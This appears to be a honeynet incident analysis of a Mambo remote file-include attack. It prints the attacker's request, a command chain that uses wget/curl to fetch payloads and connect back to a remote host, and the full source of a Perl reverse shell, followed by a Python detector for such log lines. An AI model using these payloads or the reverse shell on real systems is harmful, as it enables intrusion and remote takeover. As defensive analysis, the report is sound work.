Mambo exploit

This section describes an instance of the Mambo exploit observed on our honeynet. The hosts involved in the attack are:

  • 216.63.z.z is the initiator of the exploit
  • 10.0.x.x is the victim
  • 66.98.a.a is the server on which the defacing tool resides
  • 216.99.b.b is the host the first-stage payload resides on
  • 217.160.c.c is the host that the victim connects back to
  • 219.96.d.d is the host on which the second-stage payload resides

The following activity was logged by Apache during the attack:

216.63.z.z - - [28/Feb/2006:12:30:44 +1300] GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.b.b/cback;chmod%20744%20cback;
./cback%20217.160.c.c%208081;wget%20216.99.b.b/dc.txt...

The GET request is an attempt to exploit a Mambo remote file-include vulnerability to execute http://66.98.a.a/cmd.txt on the victim host. Despite the extension .txt, the URL specifies a PHP script rather than a text file. The vulnerable code in Mambo is as follows:

require_once( "$mosConfig_absolute_path/modules/mod_mainmenu.class.php" );

When the exploit above is used against a vulnerable Mambo installation, the code that is executed is:
require_once( "http://66.98.a.a/cmd.txt?modules/mod_mainmenu.class.php" );

This simply includes the file the attacker wants and ignores the filename after the '?' character. The included code then attempts to execute the operating system commands specified by the cmd= parameter in the original HTTP request. (Successful exploitation of this vulnerability requires the allow_url_fopen configuration directive to be on.) The Philippine Honeynet Project have analysed an incident in which this script 'cmd.txt' appears: "'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface web sites." In our experience the script is often used to download further malware using wget/curl, or to test for the presence of vulnerable scripts by attempting commands such as 'id' or 'uname'. It seems that the script can also be uploaded to PHP/Apache servers to provide an easily accessible set of utilities for executing commands and searching for files. This is only an issue if the web server allows the upload of PHP scripts to the web root. The command that was parsed out is as follows:

cd /tmp; wget 216.99.b.b/cback; chmod 744 cback; ./cback 217.160.c.c 8081; wget 216.99.b.b/dc.txt; chmod 744 dc.txt; perl dc.txt 217.160.c.c 8081;cd /var/tmp; curl -o cback http://216.99.b.b/cback;chmod 744 cback; ./cback 217.160.c.c 8081; curl -o dc.txt http://216.99.b.b/dc.txt;chmod 744 dc.txt; perl dc.txt 217.160.c.c 8081;echo YYY;echo|

Five distinct hosts have participated in the attack up to the point that this command is executed:

  • the victim
  • the host that exploited the vulnerability and initiated the download
  • the host that the malware is downloaded from
  • the host that will be connected to on port 8081
  • the host where the "Defacing Tool v2.0" resides
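As an added illustration, not part of the honeynet report, the following Python script applies the analysis above to access-log lines: it flags any request that sets a mosConfig_* global to a remote URL, URL-decodes the cmd= parameter, and lists the download and connect-back hosts named in it. The log lines are constructed from the request and the decoded command shown above, with the report's anonymised addresses; the regular expressions and the host-extraction heuristics are this example's own.

```python
import re
from urllib.parse import quote, unquote, urlsplit

# Constructed sample log in the report's format: the attacker's request rebuilt from the
# decoded command above (anonymised addresses kept), plus one benign request.
ATTACK_CMD = ("cd /tmp; wget 216.99.b.b/cback; chmod 744 cback; ./cback 217.160.c.c 8081; "
              "wget 216.99.b.b/dc.txt; chmod 744 dc.txt; perl dc.txt 217.160.c.c 8081;"
              "cd /var/tmp; curl -o cback http://216.99.b.b/cback;chmod 744 cback; "
              "./cback 217.160.c.c 8081; curl -o dc.txt http://216.99.b.b/dc.txt;"
              "chmod 744 dc.txt; perl dc.txt 217.160.c.c 8081;echo YYY;echo|")
SAMPLE_LOG = (
    "216.63.z.z - - [28/Feb/2006:12:30:44 +1300] GET /index2.php?option=com_content"
    "&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS="
    "&mosConfig_absolute_path=http://66.98.a.a/cmd.txt?&cmd=" + quote(ATTACK_CMD, safe=";/")
    + "\n198.51.100.7 - - [28/Feb/2006:12:31:02 +1300] GET /index.php?option=com_content&id=12\n")

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "?(?:GET|POST|HEAD) (\S+)')
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|]*?(?:https?://)?([0-9A-Za-z.-]+)/")  # download hosts
CALLBACK_RE = re.compile(r"(?:\./\S+|perl\s+\S+)\s+([0-9A-Za-z.-]+)\s+(\d{1,5})(?=[;\s]|$)")  # "<prog> HOST PORT"
REMOTE = ("http://", "https://", "ftp://")

def query_params(target):
    """(name, value) pairs of the request target, values URL-decoded. Splitting on
    '&' only keeps the nested '?' of the Mambo request inside the id value."""
    pairs = []
    for pair in target.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs

def detect_rfi(line):
    """Finding dict when a mosConfig_* global is set to a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    params = query_params(target)
    includes = [v for n, v in params if n.startswith("mosConfig_") and v.lower().startswith(REMOTE)]
    if not includes:
        return None
    cmd = next((v for n, v in params if n == "cmd"), "")
    fetch_hosts = list(dict.fromkeys(FETCH_RE.findall(cmd)))
    callbacks = list(dict.fromkeys((h, int(p)) for h, p in CALLBACK_RE.findall(cmd)))
    hosts = {client, urlsplit(includes[0]).hostname, *fetch_hosts, *(h for h, _ in callbacks)}
    return {"client": client, "include_url": includes[0], "command": cmd,
            "fetch_hosts": fetch_hosts, "callbacks": callbacks, "hosts": sorted(hosts)}

def scan(log_text):
    return [f for f in map(detect_rfi, log_text.splitlines()) if f]
```

Run against the sample, the single finding names the four external hosts of the list above (the victim is the server writing the log), which is the set a responder would block or hunt for across the rest of the estate.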

The script dc.txt is a simple connect-back shell written in Perl:

 #!/usr/bin/perl
 use Socket;
 use FileHandle;
 $IP = $ARGV[0];     # host to connect back to (217.160.c.c in this incident)
 $PORT = $ARGV[1];   # port to connect back to (8081)
 socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
 connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
 SOCKET->autoflush();
 # redirect the shell's standard streams over the socket
 open(STDIN, ">&SOCKET");
 open(STDOUT,">&SOCKET");
 open(STDERR,">&SOCKET");
 # fingerprint the host, then hand the remote end an interactive shell with no history file
 system("id; pwd; uname -a; w; HISTFILE=/dev/null /bin/sh -i");

The behavior of this script was studied on a virtual machine. The script downloaded and executed another Perl program, the IRC bot variant PERL/Shellbot. This joined a particular IRC channel and waited for commands.